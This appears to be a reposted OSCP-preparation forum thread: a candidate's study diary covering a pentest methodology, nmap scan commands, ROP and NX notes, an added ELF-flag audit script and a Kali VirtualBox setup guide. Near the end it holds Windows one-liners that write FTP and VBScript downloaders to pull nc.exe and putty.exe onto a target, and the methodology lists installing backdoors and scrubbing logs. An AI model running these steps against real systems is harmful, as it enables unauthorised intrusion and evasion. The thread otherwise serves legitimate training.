OSCP - JollyFrogs' tale

2017, Dec 02    


original post

I’ll be starting my OSCP journey soon; that is to say: I have already started preparations for the journey but have not signed up to the course yet. I am spending a lot of time sharpening my axe in anticipation of the OSCP tree that yearns to be felled. I have done away with modesty and challenged myself with the goal to subvert 100% of the lab machines and get a 100% marking score on my exam, first try. I am very lucky to have a very understanding second half who fully supports my endeavor. 600 hours of self-study and lab time have been set aside for this great adventure.

My basic plan is as follows:

  • Read as many forums and blogs as I can - This task is complete
  • Utilize the resources from those forums and blogs to prepare - This is where I am now
  • After preparing, I will sign up for the OSCP study and maximize my lab time

I will dedicate 2-3 hours per day plus 8-10 in the weekends to studies. I’ll sign up for 3 months lab and should be able to put in more or less 360 hours of lab time if I prepare well. Seeing there are about 60 machines in the lab, that’s an average of 6 hours per machine owned. I never expected this to be easy.

My preparation tasks are proceeding well. I will detail more about my preparations in days to come.

I got introduced to the OSCP certification during an interview where the interviewer asked me if I had the OSCP credential. After the interview I immediately looked up OSCP on google and found a wealth of information in forums and blog entries about the course. After reading many posts and blogs, I decided that I wanted (read “wanted” and not “needed”) to do the OSCP, so I started doing lots of research into OSCP and the materials. I learnt that the primary required attribute of any pentest is the preparation and enumeration phase. I learnt about how hard the labs were, and that some machines like Sufference, Pain and Gh0st were amongst the hardest, toughest nuts to crack. This appealed to me and I set myself a challenge: To hack each and every machine in the labs, and to pass my exam with a 100% score. There are around 60 lab machines and many people struggle in the labs, so this is going to be quite the achievement. I would have to maximize my time in the labs as much as possible if I wanted a chance at hacking (aka “owning” or “pwning”) each and every machine that was presented to me.

After reading many forums, blogs, tweets, and any other information I could get my hands on, I realised that I would have to prepare thoroughly if I wanted to maximise my time in the labs. I’ve read about some people taking 4 weeks just to get through the course materials, then another 4 weeks to get everything in order before they can access the labs. I was not going to let that happen to me, I wanted to start tackling the labs from the get go. I asked my partner if she was ok with me disappearing into virtual labs every night and every weekend for the next 3 months, she is very supportive.

One of the most important aspects of my preparations would be to decide what note-keeping software I was going to use. OSCP recommends a program called “KeepNote”, but me being me, I decided to make up my own mind. So I spent two full days trying various note-keeping programs. I tried CherryTree, KeepNote, EverNote, OneNote, NoteCase, Zim, KeyNote, and many more. I had certain requirements for what a good note-keeping tool would have to do if I wanted to maximise my time in the labs:

  • Hierarchical (tree with sub branches and “leaves” aka pages)
  • Easy screen Clipping feature (press a shortcut and the program inserts a screenshot for you in your notes)
  • NOT in the cloud (I prefer not to put personally identifiable items in the cloud)
  • Export into .PDF or .DOC format so I didn’t have to rewrite my report after taking the notes

CherryTree, KeepNote and OneNote were my preferred tools. I really liked OneNote with one exception: The free version of OneNote forces you to save everything into the cloud, unencrypted. CherryTree looked good, plenty of addons and plugins and it could do what I wanted although simple things like setting up screen clipping were very clumsy. I eventually settled on KeepNote, due to its simple layout and integrated screenshot functionality. The only downside of KeepNote is that it can’t save its output in .PDF format. But when I thought about that requirement a bit more, it didn’t make sense to just compile my notes in a .PDF and send that off to the OffSec guys: Plenty of items in my notebook would be for personal use only or not relevant to the exam. Many screenshots I might not need or want in the report so I would probably have to compile a separate report anyway, which I have decided to do in Word, using the information and screenshots in KeepNote.

I’ve started using KeepNote now and I’m very satisfied with the decision to use KeepNote, having tried many other tools. I’m writing this note in KeepNote!

Tips on using KeepNote:

  • Take a screenshot by pressing CTRL-INSERT.
  • Run KeepNote off an SSD hard drive otherwise it can be sluggish.
  • If possible, don’t attach files into KeepNote or it might corrupt your notes. Try to keep sploits/files in a separate directory on your PC.
  • Spend a few hours setting up your folder structure.
  • Make frequent backups. I backup my KeepNote notebook every 3-4 hours.

Another week has passed, and I’m having a blast with the OSCP preparations so far. I haven’t even registered for the course yet, as I am still sharpening my axe. I’ve started thinking about a calculated approach for pen-testing. I felt the generic approach was a bit vague, so I have come up with a much more detailed approach. I intend to script as many of the steps as possible, I’ve started scripting 1) and 3)

The system I came up with (which I will probably tune once I get started in the labs) is as follows:

  1. Recon scripts: Automated recon of a network. This will give us a generic idea of what kind of machines are on the network and the various OS’s and possible “sweet spots” to start the exploitation process. Only the top 10-20 ports are scanned but we’re scanning the whole /24 range.
  2. Mapping scripts: Mapping is where I aggregate the data gathered from the recon scripts and start to make sense of things. This includes relationships between systems and traffic flows. This is a manual step which will be done in Visio manually. I have built a Visio template diagram which I will use for this purpose. Mapping will be a continuous process as I move forward in the lab and the Visio diagram will be updated on an almost daily basis.
  3. Remote enumeration scripts: These are scripts which will scan a single system remotely, mostly enumerating ports and shares but also the information FROM those ports. This is where the full 1-65535 ports will be scanned (both TCP and UDP) and where each port is fingerprinted, SMB shares are enumerated, user IDs, SNMP details, FTP banners, OS versions etc
  4. Remote Exploits & Privilege Escalation: Here we move from knocking on the door to bashing the door out of its sockets and force entry in to the remote system. This includes remote “point-and-shoot-instant-system-access”, FTP brute-force, HTTP directory brute force, SNMP brute force, active exploits against open services, etc
  5. Local Enumeration scripts: Once we have entered the machine remotely, we enumerate again, getting as much information from the system as possible. This includes interesting files, bash history, cmd history, environment settings, memory, running services, directory permissions, service permissions, scheduled jobs, weak permissions etc
  6. Local Exploits & Privilege escalation: We might have a low level user, or a restricted administrator account, this is where we escalate to full root/system level access. This includes UAC bypass, elevation scripts, local exploits, brute forcing, etc
  7. Persistence: This is where we install backdoors to secure our access. We don’t want to have to go through the whole steps above again. Things like adding local administrator accounts, setting service to start automatic on boot, putting a pinhole in the firewall service, etc
  8. Root Loot scripts: This is where we search the whole system with system/root access for interesting data. This includes stealing hashes from LSA, configuration scripts, SAM/shadow database, cracking MD5 and NTLM, checking currently connected users, checking relationship between this host and other hosts, etc
  9. Cleanup: This is where we scrub logfiles, clean exploits, hide backdoors, essentially we “wipe our fingerprints” from the system
  10. Update maps and diagrams, and move to another system on point 3)

[Quote] Originally Posted by Mitechniq

I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test. Since you will be using Kali for the labs and the exams, wouldn’t it just be better to download Kali and familiarize yourself with it.

I don’t believe that using a powerful tool such as Metasploit will teach the level of fundamentals that I am seeking.

I learned about fuzzing, assembly language, endian systems, memory and debuggers. The easy path would have been to use a readily available fuzzing tool, or a proof of concept code and modify the shell code to open a shell to a slightly different IP address.

I chose the hard way and wrote a Python script (I had never seen a Python script until 2 weeks ago) to fuzz the application, based on another exploit I had written for a more basic application. The result of coding the fuzzer myself is that I know what each and every line of code does and why it is there. In the process of exploiting VulnServer.exe I created a generic process for writing exploits.

I seek not just to admire the magic, but to understand and master it.

[Quote] Originally Posted by MrAgent

Just a word of advice. If you’re going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.

Agreed, I was anticipating firewalls blocking ICMP. These are the commands I decided on using:

  1. Start with a recon scan of the network to get an idea of the network:
nmap -Pn -F -sSU -T5 -oX /root/ | grep -Ev 'filtered|closed' > /root/quick_recon.txt
  2. Then force-scan all ports UDP + TCP per host (takes about 4 minutes per host on a LAN or roughly 17 hours for 254 hosts):
nmap -Pn -sSU -T4 -p1-65535 -oX /root/ | grep -Ev 'filtered|closed'
  3. Then run an intensive scan on the open ports per host, TCP and UDP separately to speed scan up:
# tcp:
nmap -nvv -Pn -sSV -T1 -p$(cat | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/

# udp:
nmap -nvv -Pn -sUV -T1 -p$(cat | grep portid | grep protocol=\"udp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/

Note: During the lab time, I intend to reset the host before doing a full port scan. I will reset each host before I attack it to ensure that there are no spoilers or backdoors on the host.

I learnt about ROP chains yesterday. Very interesting stuff. How did I get into ROP chains, and what are they? Ohhh good question, let’s go back in time! Keep in mind, I haven’t yet started the course, this is all part of my preparations to maximize lab time

In the OSCP Syllabus (available here: https://www.offensive-security.com/d…-with-kali.pdf) a “Crossfire” application is mentioned. I went to exploit-db.com and saw that crossfire 1.9.0 is vulnerable to a buffer overflow (https://www.exploit-db.com/exploits/1582/). The code is in C and is overly complex for my needs (dynamic shellcodes etc). The code abuses an overflow in the “setup sound” module and I had to fuzz the application with various codes until I found the exploit code I needed and the server crashed. I am running the Crossfire application on my Kali machine and use Evan’s Debugger (EDB), which comes as part of the Kali distribution. After crashing the server, finding the bad characters and being able to overwrite the EIP, I sent my reverse shell in anticipation of a prompt… and nothing happened!

In EDB I saw a segmentation fault. This was new. I put a breakpoint on the JMP ESP trampoline I had set up to jump to my shell code, and reran the exploit. EDB broke at my JMP ESP trampoline, I pressed F8 to step one instruction further and surely I was in my jump code which was about to jump to my shell code. When I pressed F8 on the first instruction in my jump code I got a segmentation fault. This was new and unexpected! Why would the program segment fault on a perfectly good instruction? I started googling “Linux memory segmentation fault” which gave too many results, I then searched “linux segmentation fault exploit” and found “c - Exploiting buffer overflow leads to segfault” on Information Security Stack Exchange, which hints toward a feature called ASLR and “-z execstack”. Further research indicates that these are two memory protection mechanisms: ASLR randomizes the memory address space and the -z execstack relates to a feature called execshield (aka “NX bit”, aka “DX”, aka Execute Disable, aka DEP, aka many other names). I checked on my Kali machine whether this might be the culprit with the following command: dmesg | grep --color '[NX|DX]*protection' and indeed, NX was enabled. Further investigation into the possibility to disable NX bit (including via my virtualbox option “Enable PAE/NX”) would just result in Kali emulating NX and not really solve my problem in the first place: If this was a remote host, would I be able to disable NX via its host system or via kernel options? The answer is most likely no, unless I had some kind of root/system/god-mode access to the network in which case the exercise would not be required.

DEP/NX works very simply: If memory is R/W, then it can’t be X. If memory is R/X, then it can’t be W. So if we can WRITE to the memory (stack) then we can’t EXECUTE it (hence the segmentation fault). If we can EXECUTE it, we can’t WRITE to it.

So I started looking into the option to exploit this “NX bit” and whether I could program around it: Enter ROP! ROP stands for Return Oriented Programming. Where normal programs use the EIP address to point to the next instruction, ROP uses the ESP address to point to the next instruction. How can this be? Well, it turns out that any “RET” instruction in programs looks up the original source address which it gets from the ESP, not the EIP. So while normally we’d try to control the flow of a program with EIP, with ROP we try and control the flow of the program with ESP. Let me explain:

Normal execution: MOV EAX,1 -> EIP increased by one which points to the next instruction -> MOV EBX,1 -> EIP increased by one which points to the next instruction etc

ROP execution: ESP points to RET -> return address taken from ESP stack -> ESP points to another RET -> EIP never gets a chance to play

So what good is it to execute RET instructions the whole time? Well not much. But here comes the genius: If we can find OTHER instructions just before the RET instructions, we can have the system execute those instructions, the RET will be next which we control because we control the ESP stack. We can’t WRITE the instructions we’re using, but we can EXECUTE them (and as such, DEP allows us to execute).

And that’s where I am now, do I install a vulnerable operating system without NX support and simply follow the exercises, or do I write a ROP exploit for Crossfire 1.9.0? The ROP exploit is tempting but will be time-consuming, it could take me a week to finish a ROP exploit, which I could spend on finishing my preparations. I’ll keep you posted!
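
The R/W-versus-X rule described in this post is recorded in a binary's ELF program headers, so it can be checked before any debugging starts. The following is an added example, not part of the original thread: it reports whether the stack is marked executable (the flag that `-z execstack` sets) and whether any loadable segment is both writable and executable. The function names and the in-memory sample images are constructed for illustration.

```python
import struct
import sys

PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def program_headers(data):
    """Yield (p_type, p_flags) for each program header of an ELF image."""
    if len(data) < 16 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported ELF class or byte order")
    end = "<" if ei_data == 1 else ">"
    if ei_class == 1:   # ELF32: p_flags is the 7th field of a program header
        ehdr, phdr, flags_idx = (struct.Struct(end + "HHIIIIIHHHHHH"),
                                 struct.Struct(end + "IIIIIIII"), 6)
    else:               # ELF64: p_flags moved up to the 2nd field
        ehdr, phdr, flags_idx = (struct.Struct(end + "HHIQQQIHHHHHH"),
                                 struct.Struct(end + "IIQQQQQQ"), 1)
    if len(data) < 16 + ehdr.size:
        raise ValueError("truncated ELF header")
    fields = ehdr.unpack_from(data, 16)
    e_phoff, e_phentsize, e_phnum = fields[4], fields[8], fields[9]
    if e_phnum and e_phentsize < phdr.size:
        raise ValueError("program header entries too small")
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + phdr.size > len(data):
            raise ValueError("truncated program header table")
        ph = phdr.unpack_from(data, off)
        yield ph[0], ph[flags_idx]


def audit(data):
    """Summarise the W^X posture that the ELF headers request from the loader."""
    # Without PT_GNU_STACK the kernel applies an architecture-dependent default.
    stack = "no PT_GNU_STACK"
    wx_load = 0
    for p_type, p_flags in program_headers(data):
        if p_type == PT_GNU_STACK:
            stack = "executable" if p_flags & PF_X else "non-executable"
        elif p_type == PT_LOAD and p_flags & PF_W and p_flags & PF_X:
            wx_load += 1   # a segment that is writable AND executable
    return {"stack": stack, "wx_load_segments": wx_load}


def build_elf32(segments):
    """Constructed sample: header-only little-endian ELF32 image (i386)."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = struct.pack("<HHIIIIIHHHHHH",
                       2, 3, 1, 0, 52, 0, 0, 52, 32, len(segments), 0, 0, 0)
    phdrs = b"".join(struct.pack("<IIIIIIII", p_type, 0, 0, 0, 0, 0, flags, 0x1000)
                     for p_type, flags in segments)
    return ident + ehdr + phdrs


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Audit a real binary given on the command line.
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], audit(fh.read()))
    else:
        # Constructed samples: a default link and one linked with -z execstack.
        default_link = build_elf32([(PT_LOAD, PF_R | PF_X),
                                    (PT_LOAD, PF_R | PF_W),
                                    (PT_GNU_STACK, PF_R | PF_W)])
        execstack_link = build_elf32([(PT_LOAD, PF_R | PF_X),
                                      (PT_GNU_STACK, PF_R | PF_W | PF_X)])
        print("default link:", audit(default_link))
        print("-z execstack:", audit(execstack_link))
```

Running it with a path argument audits that file; with no argument it prints the results for the two constructed images.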

[Quote] Originally Posted by wes allen

You should read up on EMET, and how to bypass it, if you are interested learning more about modern memory protections.

Hi Wes,

Thanks. The current exploit I’m writing runs on Linux and EMET seems to use similar techniques to the Linux memory protections. I’ve decided to go the hard way and write a ROP exploit for Crossfire 1.9.0 running on Kali 1.1.0a. I will read up on EMET after I get success - which could take considerable effort and time.

Ok, so after spending two full days programming ROP chains, I finally created a working ROP chain which works on the Kali PAE image. I now realize that I have been working with the wrong image from the very start.

So here is a tip:

When downloading the Kali image from the offensive security site (https://www.offensive-security.com/k…mage-download/) make sure you choose the image called “Kali 32 bit VM” and not the image called “Kali 32 bit PAE VM” like I did haha, I learnt today that sometimes, more is not better.

I did learn a lot by using the PAE image:

  • Built a working ROP chain
  • Use gdb and edb debuggers more proficiently
  • Write scripts more efficiently
  • Found lots of interesting websites in the process
  • Got better at python scripting
  • Learnt some really cool assembly tricks
  • Learnt to decompile shellcode to assembly code to analyze what it does
  • Learnt to write my own shellcode in assembly, compile it and run it!
  • including my own first assembly reverse shell

But, I must keep on track, it’s time to move on to web application vulnerabilities and SQL injection, woop woop!

JollyFrogs, Brisbane Australia

Version: 0.1

Revision date: 26 May 2015

My OSCP build guide

Welcome message

This is my OSCP build guide, the goal of this guide is to help set up a Linux Kali machine on VirtualBox for OSCP studying.

Note: This guide is written for Windows 7 64-bit Host OS, I strongly advise using this operating system to install your OSCP machines.

This is the hardware that I used to set up this lab, if you don’t have similar or better hardware, I advise investing a little in getting good hardware:

  • Asus Maximus Hero VI motherboard
  • 32GB memory (Kingston)
  • Intel 120GB SSD
  • Core i7-4770K CPU @ 3.50GHz, 4 Core(s), 8 Logical Processors
  • Windows 7 64-bit (6.1.7601 SP1)

I have created this lab using my own network IP addressing, details of which are: (All subnet masks in the LAN are /24 aka

The following components are what I start with, just my PC and a router which I used as default gateway to connect to the internet:

  • = My physical internet router (a Ubiquiti ERLite3) which acts as my default gateway and DNS server.
  • = My main PC LAN interface, we will lose this IP when we configure a BRIDGE interface later

The following IP addresses are used for various components that are added during this guide:

  • = My main PC BRIDGE interface
  • = Kali 1.1.0a VirtualBox VM

You have two options when following this guide:

  1. Rename all references to the IP addresses above and in this guide to IP addresses you are using on your LAN. Or
  2. Renumber your internal network IP addressing to use the same IP addresses as in this guide.

You do not need hardware components to set up this lab other than a beefy PC, everything is virtualized in your PC.


Note: The fun part begins in the section called “After Reboot”, but don’t skim over these first steps; they are the foundation of your environment. Any mistake here will affect your environment later in unpredictable ways, please take the time to go through these steps carefully. Spelling matters, typos matter. If you run into any issues during installation, please re-read the instructions carefully and ensure you haven’t made a typo.

IMPORTANT NOTE: I don’t isolate hosts on my network. This is a very UNSAFE practice, especially when meddling with vulnerable applications and systems while coding and testing new exploits. I run a simple but good firewall (Ubiquiti ERLite3) which protects my network from outside attacks, but more importantly, I have off-line backups of all my important files and documents. If this is something that you don’t feel 100% comfortable with, then you should set up an isolated network which is totally segregated from your home network. VirtualBox supports this kind of set up via “Host-only adapters”.

Get required files:

NOTE: Forget about this post; there is a new update at the end. Check version 1.08: “JollyFrogs OSCP PWK Kali 2.0 installation guide v108” on Pastebin.com.

VirtualBox 4.3.26 R98988: http://dlc-cdn.sun.com/virtualbox/4….-98988-Win.exe

Kali 1.1.0a (kali-linux-1.1.0a-i486.iso): http://images.offensive-security.com/kali-linux-1.1.0a-vm-486.7z

NOTE: For the OSCP exam, you’ll need the 32-bit Kali, NOT the 64-bit as people have reported issues with 64-bit.

NOTE: Don’t get the “PAE” version of Kali linux! We’ll be running buffer overflows on your Kali and PAE will make the exercise needlessly hard

Create and bridge a loop-back adapter so your virtual machines can talk to your physical PC and network

  • Click the Windows Start button (bottom left)
  • type “cmd” but do not press enter
  • Right-click “cmd.exe” (top of start bar menu) and select “run as Administrator” (Click “Yes” to confirm)

Note: In the black cmd.exe screen:

  • type “hdwwiz.exe” and press Enter

Note: the “Add Hardware Wizard” window opens

  • Click “Next”
  • Select “Install the hardware that I manually select from a list (Advanced)” and click “Next”
  • Select “Network adapters” and click “Next”
  • Select “Microsoft” and “Microsoft Loopback Adapter” under Manufacturer and Network Adapter respectively, then click “Next”
  • Click “Next” to install the loopback adapter
  • Click “Finish” to close the “Add Hardware” screen

Note: We’re still in the black cmd.exe screen:

  • type “ncpa.cpl” and press Enter

Note: the “Network Connections” window opens

  • Right-click the adapter “Microsoft Loopback Adapter” and select “Rename”
  • Rename the Loopback Adapter to “LOOPBACK” to remove confusion later
  • Right-click your wired network adapter and select “Rename”
  • Rename your wired network adapter to “LAN”
  • Highlight (left click while holding CTRL key pressed) both the LOOPBACK adapter and your LAN network adapter
  • Right click on the LOOPBACK while both adapters are highlighted and select “Bridge Connections”

Note: This will create a new network card called “Network Bridge”

  • Right-click your new bridge adapter and select “Rename”
  • Rename your wired network adapter to “BRIDGE”
  • Right-click “BRIDGE” and select “Properties”

In the “BRIDGE Properties” screen:

  • Left-click (this highlights) “Internet Protocol Version 4 (TCP/IPv4)” and click “Properties”

In the “Internet Protocol Version 4 (TCP/IPv4) Properties” screen:

In the “General” tab at the top:

Select “Use the following IP address”

IP address:

Subnet mask:

Default gateway:

Preferred DNS server:

Alternate DNS server:

  • Click “OK” to close the “Internet Protocol Version 4 (TCP/IPv4) Properties” screen
  • Click “Close” to close the “BRIDGE Properties” screen

Note: We’re still in the black cmd.exe screen:

  • type “ping www.google.com”

Note: You should see replies from the google web server. Your BRIDGE adapter is now your main network adapter

Note: Do not proceed if you do not have internet connectivity

  • Close the “Command Prompt” black cmd.exe screen

Install VirtualBox

Run “C:\GNS3\INSTALLERS\VirtualBox-4.3.26-98988-Win.exe”

Note: Click “Yes” on any opening warnings

  • Click “Next”
  • Click “Next” (install all options)
  • Click “Next”
  • Click “Yes”
  • Click “Install” to start the installation
  • Click “Yes” at the UAC warning screen
  • Click “Install” to install the device driver
  • Click “Finish”

Install Kali 1.1.0a on VirtualBox 4.3.26 R98988

Unzip the file kali-linux-1.1.0a-vm-486.7z to E:\VIRTUALBOX_DISKS\kali\

Start “Oracle VM VirtualBox”

  • Click “New”

Name: Kali110a-32bit-NOPAE

Type: Linux

Version: Debian (32 bit)

  • Click “Next”

MB: 1024

  • Click “Next”

Select “Use an existing virtual hard drive file”

  • Click the little yellow folder with the green arrow

Choose: “E:\VIRTUALBOX_DISKS\kali\Kali-Linux-1.1.0-vm-486.vmdk”

  • Click “Create”

NOTE: A new icon “Kali110a-32bit-NOPAE” was created in your “Oracle VM VirtualBox Manager”

NOTE: Leave settings at default unless otherwise stated below

NOTE: I’m showing some important settings even though they are defaults, in case the defaults change some day

  • Right-click “Kali110a-32bit-NOPAE” in the left menu and click “Settings…”

General - Advanced - Shared Clipboard: “Bidirectional”

System - Motherboard - Floppy: Untick

System - Processor - Enable PAE/NX: Make sure this is NOT ticked

Audio - Enable Audio: Untick

Network - Adapter 1 - Enable Network Adapter: Tick

Network - Adapter 1 - Attached to: “Bridged Adapter”

Network - Adapter 1 - Name: “MAC Bridge Miniport”

Network - Adapter 1 - Advanced - Adapter Type: “Intel PRO/1000 MT Desktop (82540EM)”

Network - Adapter 1 - Advanced - Promiscuous Mode: Allow All

Network - Adapter 1 - Advanced - MAC Address: 444444444444

NOTE: Set the MAC address to an easily identifiable MAC

Network - Adapter 1 - Advanced - Cable Connected: Tick

  • Click “OK” to close the “Kali110a-32bit-NOPAE - Settings” screen
  • Right-click “Kali110a-32bit-NOPAE” in the left menu and click “Start”

Note: A new screen “Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox” opens and the Kali Linux installer will boot.

In the “Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox” screen:

Your new Kali installation will boot, let it time out for 5s in the GRUB menu

You will be presented with the Kali login screen

Click anywhere in the screen with your mouse

Note: To unlock the mouse from Virtualbox, press the rightmost CTRL key on your keyboard

  • Click on “Other…”
  • Username: root
  • Password: toor

Note: You will be presented a desktop environment.

Note: Do NOT update Kali linux, we’ll make a backup first so you can go back to a clean Kali installation

In the top of the screen, click the black >_ icon (“terminal”)

In the “root@kali:~” terminal window type (omit “root@kali:~# ”):

root@kali:~# ifconfig

Note: You should see eth0 has an IP address

root@kali:~# ping

Note: You should see replies from

Press the right-most CTRL key on your keyboard to unlock the mouse

In the top menu bar of the “Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox” screen:

  • Click “Devices” -> “Insert Guest Additions CD Image…”
  • Click “Cancel” in your Kali desktop popup to dismiss the autorun popup

In the top of the screen, click the black >_ icon (“terminal”)

In the “root@kali:~” terminal window type (omit “root@kali:~# ”):

root@kali:~# cp /media/cdrom/VBoxLinuxAdditions.run .

root@kali:~# ./VBoxLinuxAdditions.run

Note: VirtualBox Linux Guest additions will now install

root@kali:~# reboot

Note: After rebooting you will notice that your mouse magically enters and exits the VM. This is because of the VirtualBox Additions!

  • Press on "Other..."

Username: root Password: kali

  • Right-click “VBOXADDITIONS_4.3.18_96516” and click “Eject” near the bottom

Note: Now that you have installed the VirtualBox additions to Kali, you can:

  • Seamlessly move the mouse in and out of the virtual machine
  • Copy/Paste to and from the virtual machine using clipboard
  • Share folders between the virtual machine guest and your host machine

In the top of the screen, click the black >_ icon (“terminal”)

In the “root@kali:~” terminal window type (omit “root@kali:~# ”):

root@kali:~# shutdown -h now

Note: Now that we have a good clean install of Linux Kali, we’ll back it up so you can restore a clean install in minutes if required

In the “Oracle VM VirtualBox Manager” window:

  • Click “File” -> “Export Appliance…”
  • Left-click “Kali110a-32bit-NOPAE” to highlight it
  • Click “Next >”


Format: “OVF 1.0”

Write Manifest file: Tick

  • Click “Next >”
  • Click “Export”

Note: The export can take quite a while

Note: After the export finishes, we have completed the installation of Kali in your network!

I’ve focused on the Windows platform in recent days. I managed to grab my notebook and took notes while falling down the rabbit hole. I’ve counted 493 pages in my notebook so far, of which about half is scripts and text.

Over the last few days I’ve learnt/done:

  • Default Windows UAC settings are easy to bypass as long as the setting is not set to “Always prompt me when programs try to run with elevated privileges”. By default, Windows 7 has this setting disabled. I’ve coded several pieces of code that allow me to run my own programs without being prompted by UAC. I’m not sure if I will need this functionality in the labs, but if I do, it will save me some research and compilation.
  • A properly built and secured Windows machine is not trivial to exploit.
  • I’ve been building a list of “interesting files” as part of my ever growing “loot list”. I’ll be enumerating 3 times per host: The first time is during remote enumeration, the second time I will enumerate as a low privilege user, the third time I will enumerate as the system/root account. Literally “Enumerate, Enumerate and Enumerate some more”. The enumeration scripts for the local user and root user are very similar: After all, I don’t know which files I will have access to under either account so I have to run all checks in my loot list, without prejudice. Would I expect an admin to give world readable permissions to the shadow file? No, but someone else might! For instance, a badly configured machine might allow access to the SAM database as a low privileged user, so any loot that would be interesting to run under the root account would be equally (if not more) interesting under the low privilege account. Similarly, some files might be hidden to my low privilege user which will only be reachable under the system/root account.
  • I worked on my windows one-liner command skills, learnt a lot
  • I created a tool-set for downloading files to windows machines using various techniques for different platforms, using only default tools available on the target host. I would imagine that on most windows machines, tools like nc.exe won’t be available so this will provide me with an easy way to transfer the files without requiring additional tools on the windows machine.
  • I’ve learnt that a Philips HD9240 Airfryer makes delicious, crispy fries! (I bought one last week)

Over the last few weeks I’ve come to understand the importance of having a solid documenting methodology. I understand now just how easy it is to get lost in all the information out there. Spending a few days early on, perfecting my documentation system has been critical in keeping my gathered information categorized. I’m using the same major folder structure as per my post #6, and with almost 500 pages of documentation it’s still easy to find information.

I still have much to do before I can consider myself ready on the windows platform: Pre-compiling exploits, scripting, privilege escalation to name a few big ones. And that’s just the Windows side of things, after Windows there is Linux, databases, web-servers etc… I am starting to understand how people can get bogged down in their progress.

It’s Saturday and another week has flown by. I’ve had to burn the midnight oil at work and I haven’t been able to put in as much study time as I wanted. I did study every day though, just not the 3 hours I initially planned. I’ve modified my attack vector slightly, including public research in the passive recon step, and creating a new step for social engineering and client-side attacks. I still like the idea of having sub-folders with the various platforms so I’ve left that bit untouched. I started attaching my compiled exploits into my notebook, organized by platform. I haven’t had a crash yet but I ensure I keep saving the notebook every 5-10 minutes, with a full notebook backup every 2-3 hours and at the end of each day. I decided to zip the exploits before attaching them, which allows me to double-click on an entry in my KeepNote notebook which will open the contents of the zip file (the exploit) in my 7-zip explorer-like window. I wasn’t keen on double-clicking on executable exploits in KeepNote on my day-to-day desktop machine, even though I know they won’t harm my machine since I coded them. I only pre-compiled exploits with bind shells privilege escalation exploits, and I ensured that all my exploits have easily swappable shell-codes. I have kept the sources of my exploits with detailed guides on how to compile on Kali for when I need reverse shells. I have come up with a naming convention which allows me to quickly search through the ever growing list of exploits and source codes I’m hoarding. Every script and piece of code starts with a note on how to compile, how to use and how to modify.

Here are some of my Windows one-liners, these two methods can be used for any command that requires multiple lines, for instance when creating an FTP script or creating a visual basic script to download a file:

set r=^&echo:&&(echo open 21%r%ftp%r%bin%r%GET nc.exe%r%bye) > ftp.txt&&ftp -s:ftp.txt


(for %t in ("open 21" ftp bin "GET nc.exe" bye) do @echo %~t) >ftp.txt&&ftp -s:ftp.txt

Keep in mind that the Windows nc.exe tool has a limitation on the amount of data you can send per command. For instance, nc.exe will crash with the following one-liner because it is too long (it works in cmd.exe and other cli’s, just not via nc.exe):

(for %t in ("strUrl = WScript.Arguments.Item(0)" "StrFile = WScript.Arguments.Item(1)" "Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0" "Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0" "Const HTTPREQUEST_PROXYSETTING_DIRECT = 1" "Const HTTPREQUEST_PROXYSETTING_PROXY = 2" "Dim http,varByteArray,strData,strBuffer,lngCounter,fs, ts" "Err.Clear" "Set http = Nothing" "Set http = CreateObject("WinHttp.WinHttpRequest.5.1")" "If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")" "If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")" "If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")" "http.Open "GET",strURL,False" "http.Send" "varByteArray = http.ResponseBody" "Set http = Nothing" "Set fs = CreateObject("Scripting.FileSystemObject")" "Set ts = fs.CreateTextFile(StrFile,True)" "strData = """ "strBuffer = """ "For lngCounter = 0 to UBound(varByteArray)" "ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1)))" "Next" "ts.Close") do @echo %~t) >wget.vbs && cscript wget.vbs []( putty.exe

I signed up today! I enlisted with my work email, got an email on my work email with confirmation code, which I used to sign up. My account is being generated after which I will have to test out lab access. When this is confirmed, I will get the option to pay for the 90 days of labs and the exam. I’m really looking forward to starting the lab and I’m keen to see if my preparations will pay off. My goal is 100% of the lab machines owned.

I have completed my sign up for the Penetration Testing with Kali (the required course to sit the OSCP exam). The process is as follows:

  • Sign up via offensive-security.com website with a non-public email address
  • Get an email from them shortly after with a registration link
  • Use the link in the email to reserve a starting date for the labs
  • Receive an email shortly after (within a day or so) with VPN details to test the VPN connection for up to 48hrs and a payment link
  • After verifying the VPN connection works, pay for the course using the payment link (within 72 hours)
  • Wait until the starting day

So I received my VPN details to test the connection. I tested the connectivity and decided to run a quick nmap scan and to my surprise I was connected to the real lab… and I had 48 hours of play time! I wasn’t going to let that go to waste, although if I had to sign up again I probably would have signed up on a Thursday so I had the whole weekend to play. I have a full time job so I only had about 5 hours total in the labs, minus the time it took to set up the connection. So naturally, I decided to give it a go.

My scan revealed many boxes with a fair amount of open ports: This was going to be good! The OffSec people had specified in the email which host ranges to scan, and my IP address was in the 192.168.14.x range. They mentioned I should be able to ping the x.x.x.220 ip address of my range, depending on which of the lab ranges I ended up in (random). The range though, is a /23. I tried pinging and couldn’t ping it but when I tried I saw ping replies.

So out came nmap as per my methodology explained in my earlier post:

nmap -Pn -F -sSU -T5 -oX /root/ | grep -Ev 'filtered|closed' > /root/quick_recon.txt

